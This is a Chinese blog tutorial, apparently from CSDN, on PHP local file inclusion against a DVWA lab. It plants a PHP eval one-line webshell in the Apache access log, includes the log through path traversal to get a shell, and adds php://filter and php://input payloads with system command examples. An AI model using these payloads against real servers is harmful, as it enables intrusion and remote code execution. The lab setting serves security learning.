渗透测试-中间件日志包含绕过和php文件读写包含

已于 2023-01-20 10:38:14 修改
阅读量1.6k 收藏 8
点赞数 2
分类专栏: 渗透测试 文章标签: 安全性测试 web安全 安全
于 2022-04-27 20:17:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lza20001103/article/details/124458273
版权

中间件日志包含绕过

文章目录

前言

一、什么是中间件日志包含绕过

当某个PHP文件只存在本地包含漏洞,不存在远程包含漏洞,而却无法上传正常文件(无上传功能),这就意味这有包含漏洞却不能拿来利用,这时攻击者就有可能会利用apache日志文件来入侵。

Apache服务器运行后会生成两个日志文件,这两个文件是access.log(访问日志)和error.log(错误日志),apache的日志文件记录下我们的操作,并且写到访问日志文件access.log之中
例如:http://192.168.1.55:8080/dvwa/vulnerabilities/fi/?page=…/…/…/…/Apache-20\logs\access.log

使用的是DVWA环境 安全等级低

首先要把一句话木马写入到access.log访问日志中
直接在URL中加入一句话木马,回车,虽然会报错,但是没关系,我们的一句话木马已经被access文件记录了 之后只需要利用本地包含文件来运行access.log就可以了
注意要用…/来调整目录

二、中间件日志包含漏洞获取shell

1.中间件日志包含

我们在dvwa进行实验
在这里插入图片描述
将安全级别调为最低级
在这里插入图片描述点击文件包含进行实验,复制网址
http://192.168.222.4/dvwa/vulnerabilities/fi/?page=include.php
当我们无法上传文件的时候,可以注入一句话木马,回溯到日志那里去获取shell
http://192.168.222.4/dvwa/<?php @eval($_POST['chopper']); ?>

http://192.168.222.4/dvwa%3C?php%20@eval($_POST[%27chopper%27]);%20?%3E

2.利用Apache日志获取shell

我们找到日志路径
D:\phpStudy\Apache\logs\access.log
清空日志文件后
在这里插入图片描述
打开注入的网址
http://192.168.222.4/dvwa/<?php @eval($_POST['chopper']); ?>
在这里插入图片描述
注入报错,正常,日志已经包含了一句话木马,这时我们主要回到日志目录下利用就可以了
我们修改一下后面文件
http://192.168.222.4/dvwa/vulnerabilities/fi/?page=include.php

回到apache目录,就是phpstudy的目录
回溯四级目录
http://192.168.222.4/dvwa/vulnerabilities/fi/?page=…/…/…/…/Apache/logs/access.log
在这里插入图片描述
复制到蚁剑连接
在这里插入图片描述
连接成功,获取shell成功。

这里补充一下php文件读写包含的内容
这里需要大家搭建好dvwa,将安全等级设为低级才行,我这里改不了,出现了一点问题,就不进行实验了,在以下目录下放入muma.php文件
D:\phpStudy\WWW\dvwa\vulnerabilities\fi

http://192.168.222.4/dvwa/vulnerabilities/fi/?page=php://filter/read=convert.base64-encode/resource=muma.php(读)
连接蚁剑获取shell

http://192.168.222.4/dvwa/vulnerabilities/fi/?page=php://input(写)

<?php @eval($_POST['chopper']); ?>(一句话木马)

需要利用burp抓包重发

只有在allow_url_include为on时才可以使用,查看回显结果那必须在php\php-5.4.45找到ini文件
查找display_funtions=proc-open,oppen,exec,system…删掉ssytem重启apache
利用成功后,输入代码

<?php sysytem('net user'); ?>(查看当前用户信息) <?php sysytem('netstat -an'); ?>(查看端口信息)

在这里插入图片描述
这是成功的实例,扫描出了端口信息,大家可以尝试一下哦。

总结

本次实提供了一种上传不了文件,通过注入一句话木马,回到apache日志中包含进行绕过的方法。

炫彩@之星
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
中间件详解(含留存日志方法)
laoli360的博客
09-17 1936
middleware, 中间件是一个特殊的url地址处理函数,它被当作 app.use(中间件函数) 的参数或者是某个路由处理函数中使用。 中间件是 express 的最大特色,也是最重要的一个设计。Express是一个自身功能极简,完全是路由和中间件构成一个web开发框架:从本质上来说,一个Express应用就是在调用各种中间件。 一个 express 应用,就是由许许多多的中间件来完成的 中间件是一个函数。 中间件肯定不止一个,多个中间件按顺序执行, 它的格式有两种 分.
中间件之系统日志 - Thinkphp6
斩思
05-05 1669
中间件之系统日志 - Thinkphp6
文件包含漏洞全面详解
baimao__Ch的博客
05-05 711
和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。以PHP为例,常用的文件包含函数有以下四种。
网络安全笔记 -- 文件上传2(内容逻辑数组绕过中间件漏洞绕过、WAF绕过
swy66的博客
08-20 998
文件上传漏洞,中间件解析漏洞
渗透过程中日志信息分析示例
一杯咖啡的渗透记忆
04-25 1410
渗透过程中,我们可能普通账号进到了系统,在提取或者进一步信息收集的过程中,我们会获得一些日志文件,根据这些日志文件我们需要进一步的分析。
中间件日志清除
难办就别办的博客
04-12 433
很多使用Windows IIS的站长可能都会遇到这个问题,就是服务器的IIS日志增长经常会导致磁盘空间被占满,而IIS也没有自动删除日志的功能,因此需要经常关注即时清理日志。安装phpstudy使用一段时间后会产生大量占据空间的日志error.log。
日志中间件logback
CSDN_WLJ的博客
12-18 442
日志中间件logback logback在Springboot中的配置 (1) Springboot中的配置/推荐使用slf4j + logback SpringBoot项目默认的日志框架是 logback ,所以不需要引入maven依赖,只需要添加logback-spring.xml即可 (2) logback-spring.xml(配置) <?xml version="1.0" enc...
安全测试-渗透测试-不安全的http方法问题及解决方案.doc
09-10
### 安全测试渗透测试中的不安全HTTP方法问题及解决方案 ...值得注意的是,除了上述提到的解决方案外,还应该定期进行安全审计和渗透测试,以便及时发现并修复潜在的安全漏洞,确保系统的稳定运行。
人工智能-项目实践-检测-在渗透测试中快速检测常见中间件、组件的高危漏洞.zip
12-23
人工智能-项目实践-检测-在渗透测试中快速检测常见中间件、组件的高危漏洞 vulnerability-list 常见漏洞快速检测,目前包含以下漏洞的检测。 测试环境为win10,python3。 使用前需安装相关库:py -3 -m pip install...
WEB渗透测试数据库【渗透测试的辅助工具(pentest-tool)、资源文件】
最新发布
06-29
渗透测试【作品名称】: 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目介绍】: 提供轻量级的易扩展的工具,可以快速编写...
logger:用于zap的简单go-chi日志记录中间件
05-08
记录器 用于zap的简单go-chi日志记录中间件安装go get github.com/treastech/logger用法package mainimport (l "github.com/treastech/logger""github.com/go-chi/chi""go.uber.org/zap""net/http")func main () {...
CISP-PTE注册信息安全专业人员渗透测试工程师知识体系大纲
10-21
CISP-PTE注册信息安全专业人员-渗透测试工程师知识体系大纲:操作系统安全基础、中间件安全基础、数据库安全基础、web安全基础。
网站服务常用中间件-日志文件存放目录&IIS&Apache&Tomcat&Nginx&Weblogic&Jboss
m0_65842464的博客
01-21 2207
用户每打开一次网页,服务中间件日志都会记录用户IP、访问的网页地址、访问时间、访问状态等信息,这些信息保存在 服务中间件日志文件里,方便网站管理员掌握网页被访问情况和 服务器运行情况
中间件-缓存、索引、日志
善守者
01-22 1401
然后,在需要采集的机器中安装 Logstash 进程,通过 Logstash 将日志数据存储到 Elasticsearch 服务器,用户可以通过 Kibana 查询存储在 Elasticsearch 中的日志数据,这样,我们就可以有针对性地查询所需要的日志了。由于订单编号为 1 的订单信息存储在 order_db_00 中,但与这条订单关联的订单字表却存储在 order_db_01 中,而 Join 操作需要的笛卡尔积操作存在于不同的数据库实例中,所以我们就要将多个数据库中的数据统一加载到内存中。
web中间件日志分析脚本1.0(shell脚本)
Bu2n的博客
07-11 1277
web中间件日志安全分析脚本,目的减轻逐行输入代码的工作量。
web中间件日志分析脚本2.0(shell脚本)
Bu2n的博客
07-14 1035
web中间件日志分析脚本1.0 一堆bug匹配条件是POST请求、请求的URL和referer的URL为同一个页面,则判定为文件上传,至于上传的是否为webshell还要另外去查看日志分析 当日志数量非常庞大的时候会用到............
Linux下Jetty中间件日志审计
qq_60778231的博客
11-05 1126
Linux下的Jetty中间件日志审计
学习日志4:web中间件漏洞-Apache篇
m0_37622973的博客
09-03 270
Apache漏洞 什么是Apache:Apache是世界使用排名第一的Web服务器软件。它可以运行在几乎所有广泛使用的计算机平台上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩充,将Perl/Python等解释器编译到服务器中 漏洞: 1.文件名解析漏洞: (1)Apache从右向左解析文件名,若无法识别,则继续向左解析,例如a.php.a...
中间件 错误处理中间件日志中间件
weixin_44772522的博客
04-19 1067
错误处理中间件 var express=require('express'); var fs=require('fs'); var app=express(); app.get('/test',function(req,res,next){ fs.readFile('./test.txt',function(err,data){ if(err){ c...
主机、数据库、中间件、应用的渗透测试用例
06-06
以下是主机、数据库、中间件、应用的渗透测试用例: 1. 主机渗透测试用例: - 端口扫描和服务识别,识别目标主机上运行的服务类型和版本信息。 - 操作系统漏洞扫描,检查主机操作系统是否存在已知的漏洞和弱点。 - 弱口令攻击,尝试使用常见的用户名和密码组合进行登录尝试。 - 恶意软件检测,检查主机上是否存在恶意软件或后门程序。 - 权限提升,尝试提升当前用户的权限,获取系统管理员权限。 - 文件和目录扫描,检查主机上的文件和目录权限配置是否安全。 - 日志审计,检查主机的日志记录和审计机制是否完善。 2. 数据库渗透测试用例: - 数据库服务识别,识别目标数据库服务类型和版本信息。 - 弱口令攻击,尝试使用常见的用户名和密码组合进行登录尝试。 - SQL 注入攻击,测试应用程序是否能够正确过滤和处理用户输入,防止 SQL 注入攻击。 - 数据库权限配置检查,检查数据库用户和角色的权限配置是否安全。 - 数据库备份和恢复测试测试数据库备份和恢复机制是否正确运行。 - 数据库加密测试测试数据库加密和解密的安全性和性能。 - 数据库日志审计,检查数据库的日志记录和审计机制是否完善。 3. 中间件渗透测试用例: - 中间件服务识别,识别目标中间件服务类型和版本信息。 - 弱口令攻击,尝试使用常见的用户名和密码组合进行登录尝试。 - 中间件漏洞扫描,检查中间件是否存在已知的漏洞和弱点。 - 会话管理测试测试会话管理机制的安全性和有效性。 - 加密和解密测试测试中间件的加密和解密机制的安全性和性能。 - 日志审计,检查中间件日志记录和审计机制是否完善。 4. 应用渗透测试用例: - 应用服务识别,识别目标应用服务类型和版本信息。 - 目录遍历和文件包含攻击,测试目标应用程序是否存在目录遍历和文件包含漏洞。 - SQL 注入攻击,测试应用程序是否能够正确过滤和处理用户输入,防止 SQL 注入攻击。 - 跨站点脚本攻击 (XSS) 测试测试应用程序是否能够正确地过滤和处理用户输入,防止 XSS 攻击。 - 跨站点请求伪造 (CSRF) 测试测试应用程序是否能够正确地防止和检测到 CSRF 攻击。 - 文件上传测试测试应用程序的文件上传功能是否存在安全漏洞。 - 认证和授权测试测试应用程序的认证和授权机制是否安全和有效。 - 日志审计,检查应用程序的日志记录和审计机制是否完善。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值